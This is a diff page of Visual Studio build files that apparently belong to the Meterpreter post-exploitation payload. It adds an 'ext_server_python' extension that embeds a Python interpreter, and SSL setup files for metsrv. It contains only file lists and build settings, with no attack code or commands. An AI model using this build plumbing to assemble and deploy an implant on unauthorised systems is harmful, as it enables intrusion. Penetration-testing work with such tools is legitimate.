<ClCompile Include="..\..\source\extensions\python\Modules\zlib\infback.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\inffast.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\inflate.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\inftrees.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\minigzip.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\trees.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\uncompr.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\zutil.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_bisectmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_codecsmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_collectionsmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_csv.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\callbacks.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\callproc.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\cfield.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\libffi_msvc\ffi.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\libffi_msvc\prep_cif.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\libffi_msvc\win32.c">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\malloc_closure.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\stgdict.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ctypes\_ctypes.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_functoolsmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_heapqmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_hotshot.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_io\bufferedio.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_io\bytesio.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_io\fileio.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_io\iobase.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_io\stringio.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_io\textio.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_io\_iomodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_json.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_localemodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_lsprof.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_math.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_randommodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_sre.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_ssl.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_struct.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\_weakref.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\abstract.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\boolobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\bufferobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\bytearrayobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\bytes_methods.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\capsule.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\cellobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\classobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\cobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\codeobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\complexobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\descrobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\dictobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\enumobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\exceptions.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\fileobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\floatobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\frameobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\funcobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\genobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\intobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\iterobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\listobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\longobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\memoryobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\methodobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\moduleobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\object.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\obmalloc.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\rangeobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\setobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\sliceobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\stringobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\structseq.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\tupleobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\typeobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\unicodectype.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\unicodeobject.c" />
<ClCompile Include="..\..\source\extensions\python\Objects\weakrefobject.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\acceler.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\bitset.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\firstsets.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\grammar.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\grammar1.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\listnode.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\metagrammar.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\myreadline.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\node.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\parser.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\parsetok.c" />
<ClCompile Include="..\..\source\extensions\python\Parser\tokenizer.c" />
<ClCompile Include="..\..\source\extensions\python\PC\config.c" />
<ClCompile Include="..\..\source\extensions\python\PC\dl_nt.c" />
<ClCompile Include="..\..\source\extensions\python\PC\getpathp.c" />
<ClCompile Include="..\..\source\extensions\python\PC\import_nt.c" />
<ClCompile Include="..\..\source\extensions\python\PC\msvcrtmodule.c" />
<ClCompile Include="..\..\source\extensions\python\PC\_subprocess.c" />
<ClCompile Include="..\..\source\extensions\python\PC\_winreg.c" />
<ClCompile Include="..\..\source\extensions\python\Python\asdl.c" />
<ClCompile Include="..\..\source\extensions\python\Python\ast.c" />
<ClCompile Include="..\..\source\extensions\python\Python\atof.c" />
<ClCompile Include="..\..\source\extensions\python\Python\bltinmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Python\ceval.c" />
<ClCompile Include="..\..\source\extensions\python\Python\codecs.c" />
<ClCompile Include="..\..\source\extensions\python\Python\compile.c" />
<ClCompile Include="..\..\source\extensions\python\Python\dtoa.c" />
<ClCompile Include="..\..\source\extensions\python\Python\dynload_win.c" />
<ClCompile Include="..\..\source\extensions\python\Python\errors.c" />
<ClCompile Include="..\..\source\extensions\python\Python\formatter_string.c" />
<ClCompile Include="..\..\source\extensions\python\Python\formatter_unicode.c" />
<ClCompile Include="..\..\source\extensions\python\Python\frozen.c" />
<ClCompile Include="..\..\source\extensions\python\Python\future.c" />
<ClCompile Include="..\..\source\extensions\python\Python\getargs.c" />
<ClCompile Include="..\..\source\extensions\python\Python\getcompiler.c" />
<ClCompile Include="..\..\source\extensions\python\Python\getcopyright.c" />
<ClCompile Include="..\..\source\extensions\python\Python\getopt.c" />
<ClCompile Include="..\..\source\extensions\python\Python\getplatform.c" />
<ClCompile Include="..\..\source\extensions\python\Python\getversion.c" />
<ClCompile Include="..\..\source\extensions\python\Python\graminit.c" />
<ClCompile Include="..\..\source\extensions\python\Python\import.c" />
<ClCompile Include="..\..\source\extensions\python\Python\importdl.c" />
<ClCompile Include="..\..\source\extensions\python\Python\marshal.c" />
<ClCompile Include="..\..\source\extensions\python\Python\modsupport.c" />
<ClCompile Include="..\..\source\extensions\python\Python\mysnprintf.c" />
<ClCompile Include="..\..\source\extensions\python\Python\mystrtoul.c" />
<ClCompile Include="..\..\source\extensions\python\Python\peephole.c" />
<ClCompile Include="..\..\source\extensions\python\Python\pyarena.c" />
<ClCompile Include="..\..\source\extensions\python\Python\pyctype.c" />
<ClCompile Include="..\..\source\extensions\python\Python\pyfpe.c" />
<ClCompile Include="..\..\source\extensions\python\Python\pymath.c" />
<ClCompile Include="..\..\source\extensions\python\Python\pystate.c" />
<ClCompile Include="..\..\source\extensions\python\Python\pystrcmp.c" />
<ClCompile Include="..\..\source\extensions\python\Python\pystrtod.c" />
<ClCompile Include="..\..\source\extensions\python\Python\Python-ast.c" />
<ClCompile Include="..\..\source\extensions\python\Python\pythonrun.c" />
<ClCompile Include="..\..\source\extensions\python\Python\random.c" />
<ClCompile Include="..\..\source\extensions\python\Python\structmember.c" />
<ClCompile Include="..\..\source\extensions\python\Python\symtable.c" />
<ClCompile Include="..\..\source\extensions\python\Python\sysmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Python\thread.c" />
<ClCompile Include="..\..\source\extensions\python\Python\traceback.c" />
<ClCompile Include="..\..\source\extensions\python\Python\_warnings.c" />
<ClCompile Include="..\..\source\extensions\python\python_commands.c" />
<ClCompile Include="..\..\source\extensions\python\python_main.c" />
<ClCompile Include="..\..\source\extensions\python\python_meterpreter_binding.c" />
<ClCompile Include="..\..\source\extensions\python\python_ssl_bridge.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\extensions\python\Include\abstract.h" />
<ClInclude Include="..\..\source\extensions\python\Include\asdl.h" />
<ClInclude Include="..\..\source\extensions\python\Include\ast.h" />
<ClInclude Include="..\..\source\extensions\python\Include\bitset.h" />
<ClInclude Include="..\..\source\extensions\python\Include\boolobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\bufferobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\bytearrayobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\bytesobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\bytes_methods.h" />
<ClInclude Include="..\..\source\extensions\python\Include\cellobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\ceval.h" />
<ClInclude Include="..\..\source\extensions\python\Include\classobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\cobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\code.h" />
<ClInclude Include="..\..\source\extensions\python\Include\codecs.h" />
<ClInclude Include="..\..\source\extensions\python\Include\compile.h" />
<ClInclude Include="..\..\source\extensions\python\Include\complexobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\cStringIO.h" />
<ClInclude Include="..\..\source\extensions\python\Include\datetime.h" />
<ClInclude Include="..\..\source\extensions\python\Include\descrobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\dictobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\dtoa.h" />
<ClInclude Include="..\..\source\extensions\python\Include\enumobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\errcode.h" />
<ClInclude Include="..\..\source\extensions\python\Include\eval.h" />
<ClInclude Include="..\..\source\extensions\python\Include\fileobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\floatobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\frameobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\funcobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\genobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\graminit.h" />
<ClInclude Include="..\..\source\extensions\python\Include\grammar.h" />
<ClInclude Include="..\..\source\extensions\python\Include\import.h" />
<ClInclude Include="..\..\source\extensions\python\Include\intobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\intrcheck.h" />
<ClInclude Include="..\..\source\extensions\python\Include\iterobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\listobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\longintrepr.h" />
<ClInclude Include="..\..\source\extensions\python\Include\longobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\marshal.h" />
<ClInclude Include="..\..\source\extensions\python\Include\memoryobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\metagrammar.h" />
<ClInclude Include="..\..\source\extensions\python\Include\methodobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\modsupport.h" />
<ClInclude Include="..\..\source\extensions\python\Include\moduleobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\node.h" />
<ClInclude Include="..\..\source\extensions\python\Include\object.h" />
<ClInclude Include="..\..\source\extensions\python\Include\objimpl.h" />
<ClInclude Include="..\..\source\extensions\python\Include\opcode.h" />
<ClInclude Include="..\..\source\extensions\python\Include\osdefs.h" />
<ClInclude Include="..\..\source\extensions\python\Include\parsetok.h" />
<ClInclude Include="..\..\source\extensions\python\Include\patchlevel.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pgen.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pgenheaders.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pyarena.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pycapsule.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pyctype.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pydebug.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pyerrors.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pyexpat.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pyfpe.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pygetopt.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pymacconfig.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pymactoolbox.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pymath.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pymem.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pyport.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pystate.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pystrcmp.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pystrtod.h" />
<ClInclude Include="..\..\source\extensions\python\Include\Python-ast.h" />
<ClInclude Include="..\..\source\extensions\python\Include\Python.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pythonrun.h" />
<ClInclude Include="..\..\source\extensions\python\Include\pythread.h" />
<ClInclude Include="..\..\source\extensions\python\Include\py_curses.h" />
<ClInclude Include="..\..\source\extensions\python\Include\rangeobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\setobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\sliceobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\stringobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\structmember.h" />
<ClInclude Include="..\..\source\extensions\python\Include\structseq.h" />
<ClInclude Include="..\..\source\extensions\python\Include\symtable.h" />
<ClInclude Include="..\..\source\extensions\python\Include\sysmodule.h" />
<ClInclude Include="..\..\source\extensions\python\Include\timefuncs.h" />
<ClInclude Include="..\..\source\extensions\python\Include\token.h" />
<ClInclude Include="..\..\source\extensions\python\Include\traceback.h" />
<ClInclude Include="..\..\source\extensions\python\Include\tupleobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\ucnhash.h" />
<ClInclude Include="..\..\source\extensions\python\Include\unicodeobject.h" />
<ClInclude Include="..\..\source\extensions\python\Include\warnings.h" />
<ClInclude Include="..\..\source\extensions\python\Include\weakrefobject.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\alg_jisx0201.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\cjkcodecs.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\emu_jisx0213_2000.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\mappings_cn.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\mappings_hk.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\mappings_jisx0213_pair.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\mappings_jp.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\mappings_kr.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\mappings_tw.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\cjkcodecs\multibytecodec.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\md5.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\rotatingtree.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\crc32.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\deflate.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\inffast.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\inffixed.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\inflate.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\inftrees.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\trees.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\zconf.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\zlib.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\zlib\zutil.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\_io\_iomodule.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\_math.h" />
<ClInclude Include="..\..\source\extensions\python\Modules\_ssl_data.h" />
<ClInclude Include="..\..\source\extensions\python\Objects\stringlib\count.h" />
<ClInclude Include="..\..\source\extensions\python\Objects\stringlib\fastsearch.h" />
<ClInclude Include="..\..\source\extensions\python\Objects\stringlib\find.h" />
<ClInclude Include="..\..\source\extensions\python\Objects\stringlib\partition.h" />
<ClInclude Include="..\..\source\extensions\python\Objects\stringlib\split.h" />
<ClInclude Include="..\..\source\extensions\python\Objects\unicodetype_db.h" />
<ClInclude Include="..\..\source\extensions\python\Parser\parser.h" />
<ClInclude Include="..\..\source\extensions\python\Parser\tokenizer.h" />
<ClInclude Include="..\..\source\extensions\python\PC\errmap.h" />
<ClInclude Include="..\..\source\extensions\python\PC\pyconfig.h" />
<ClInclude Include="..\..\source\extensions\python\Python\importdl.h" />
<ClInclude Include="..\..\source\extensions\python\Python\thread_nt.h" />
<ClInclude Include="..\..\source\extensions\python\python_commands.h" />
<ClInclude Include="..\..\source\extensions\python\python_main.h" />
<ClInclude Include="..\..\source\extensions\python\python_meterpreter_binding.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="..\..\source\extensions\python\Resource Files\python_core.rc" />
</ItemGroup>
<ItemGroup>
<None Include="..\..\source\extensions\python\Resource Files\python_core.rh" />
</ItemGroup>
<ItemGroup>
<MASM Include="..\..\source\extensions\python\Modules\_ctypes\libffi_msvc\win64.asm">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">true</ExcludedFromBuild>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

1027
c/meterpreter/workspace/ext_server_python/ext_server_python.vcxproj.filters Executable file
View File

File diff suppressed because it is too large Load Diff

18
c/meterpreter/workspace/meterpreter.sln Normal file → Executable file
View File

@ -31,6 +31,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_sniffer", "ext_s
EndProject EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_extapi", "ext_server_extapi\ext_server_extapi.vcxproj", "{42E143CB-6086-4FF1-A4AE-D8545782DD31}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_extapi", "ext_server_extapi\ext_server_extapi.vcxproj", "{42E143CB-6086-4FF1-A4AE-D8545782DD31}"
EndProject EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_python", "ext_server_python\ext_server_python.vcxproj", "{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_kiwi", "ext_server_kiwi\ext_server_kiwi.vcxproj", "{1C307A8B-A88E-43EE-8E80-01E6EFE38697}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ext_server_kiwi", "ext_server_kiwi\ext_server_kiwi.vcxproj", "{1C307A8B-A88E-43EE-8E80-01E6EFE38697}"
EndProject EndProject
Global Global
@ -281,6 +283,22 @@ Global
{1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|Win32.Build.0 = Release|Win32 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|Win32.Build.0 = Release|Win32
{1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|x64.ActiveCfg = Release|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|x64.ActiveCfg = Release|x64
{1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|x64.Build.0 = Release|x64 {1C307A8B-A88E-43EE-8E80-01E6EFE38697}.Release|x64.Build.0 = Release|x64
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|Win32.ActiveCfg = Debug|Win32
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|Win32.Build.0 = Debug|Win32
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|x64.ActiveCfg = Debug|x64
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Debug|x64.Build.0 = Debug|x64
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_debug|Win32.ActiveCfg = r7_debug|Win32
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_debug|Win32.Build.0 = r7_debug|Win32
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_debug|x64.ActiveCfg = r7_debug|x64
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_debug|x64.Build.0 = r7_debug|x64
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|Win32.ActiveCfg = r7_release|Win32
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|Win32.Build.0 = r7_release|Win32
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|x64.ActiveCfg = r7_release|x64
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.r7_release|x64.Build.0 = r7_release|x64
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|Win32.ActiveCfg = Release|Win32
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|Win32.Build.0 = Release|Win32
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|x64.ActiveCfg = Release|x64
{FB776F5E-BF58-478F-94EE-5B69D84DB9ED}.Release|x64.Build.0 = Release|x64
EndGlobalSection EndGlobalSection
GlobalSection(SolutionProperties) = preSolution GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE HideSolutionNode = FALSE

2
c/meterpreter/workspace/metsrv/metsrv.vcxproj
View File

@ -649,6 +649,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
</PostBuildEvent> </PostBuildEvent>
</ItemDefinitionGroup> </ItemDefinitionGroup>
<ItemGroup> <ItemGroup>
<ClCompile Include="..\..\source\server\ssl_lib_setup.c" />
<ClCompile Include="..\..\source\server\win\libloader.c" /> <ClCompile Include="..\..\source\server\win\libloader.c" />
<ClCompile Include="..\..\source\server\metsrv.c"> <ClCompile Include="..\..\source\server\metsrv.c">
<PrecompiledHeader>Create</PrecompiledHeader> <PrecompiledHeader>Create</PrecompiledHeader>
@ -708,6 +709,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformSho
<ClInclude Include="..\..\source\server\libloader.h" /> <ClInclude Include="..\..\source\server\libloader.h" />
<ClInclude Include="..\..\source\server\metsrv.h" /> <ClInclude Include="..\..\source\server\metsrv.h" />
<ClInclude Include="..\..\source\server\remote_dispatch.h" /> <ClInclude Include="..\..\source\server\remote_dispatch.h" />
<ClInclude Include="..\..\source\server\ssl_lib_setup.h" />
<ClInclude Include="..\..\source\server\win\server_transport_tcp.h" /> <ClInclude Include="..\..\source\server\win\server_transport_tcp.h" />
<ClInclude Include="..\..\source\server\win\server_transport_winhttp.h" /> <ClInclude Include="..\..\source\server\win\server_transport_winhttp.h" />
<ClInclude Include="..\..\source\server\win\server_transport_wininet.h" /> <ClInclude Include="..\..\source\server\win\server_transport_wininet.h" />

2
c/meterpreter/workspace/metsrv/metsrv.vcxproj.filters
View File

@ -15,6 +15,7 @@
<ClCompile Include="..\..\source\server\win\server_transport_wininet.c"> <ClCompile Include="..\..\source\server\win\server_transport_wininet.c">
<Filter>transports</Filter> <Filter>transports</Filter>
</ClCompile> </ClCompile>
<ClCompile Include="..\..\source\server\ssl_lib_setup.c" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<ClInclude Include="..\..\source\server\libloader.h" /> <ClInclude Include="..\..\source\server\libloader.h" />
@ -29,6 +30,7 @@
<ClInclude Include="..\..\source\server\win\server_transport_wininet.h"> <ClInclude Include="..\..\source\server\win\server_transport_wininet.h">
<Filter>transports</Filter> <Filter>transports</Filter>
</ClInclude> </ClInclude>
<ClInclude Include="..\..\source\server\ssl_lib_setup.h" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<None Include="..\..\source\server\win\metsrv.def" /> <None Include="..\..\source\server\win\metsrv.def" />